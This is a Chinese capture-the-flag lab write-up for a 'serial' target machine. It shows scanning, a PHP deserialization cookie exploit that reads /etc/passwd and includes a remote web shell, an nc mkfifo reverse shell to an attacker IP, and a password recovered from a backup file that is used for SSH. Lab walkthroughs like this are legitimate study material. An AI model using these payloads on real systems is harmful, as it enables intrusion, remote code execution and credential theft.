serial靶机

ip地址扫描

image.png

端口扫描

image.png

目录扫描

image.png
image.png

抓包,查看cookie

image.png
编写php代码

<?php
  class Log {
    private $type_log = "/etc/passwd";
  }
 
  class User {
    private $name = "admin";
    private $wel;
 
    function __construct() {
      $this->wel = new Log();
  }
}
$obj = new User();
echo base64_encode(serialize($obj));

image.png
进行访问
image.png
将编码后的,赋值给cookie
image.png
编写2.txt

<?php system($_GET['cmd']);?>

将2.txt包含进去

<?php
  class Log {
    private $type_log = "http://192.168.110.118/2.txt";
  }
 
  class User {
    private $name = "admin";
    private $wel;
 
    function __construct() {
      $this->wel = new Log();
  }
}
$obj = new User();
echo base64_encode(serialize($obj));

image.png
再次访问
image.png
将生成的编码赋值给cookie
cmd=id
image.png

反弹shell

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh±i+2>%261|nc+192.168.237.131+4444+>/tmp/f
image.png
kali进行监听

image.png
cd / 进入根目录
image.png
image.png
查看 credentials.txt.bak 发现密码
image.png
KywZmnPWW6tTbW5w

ssh连接

在物理机上 使用ssh连接
image.png

得到flag

image.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值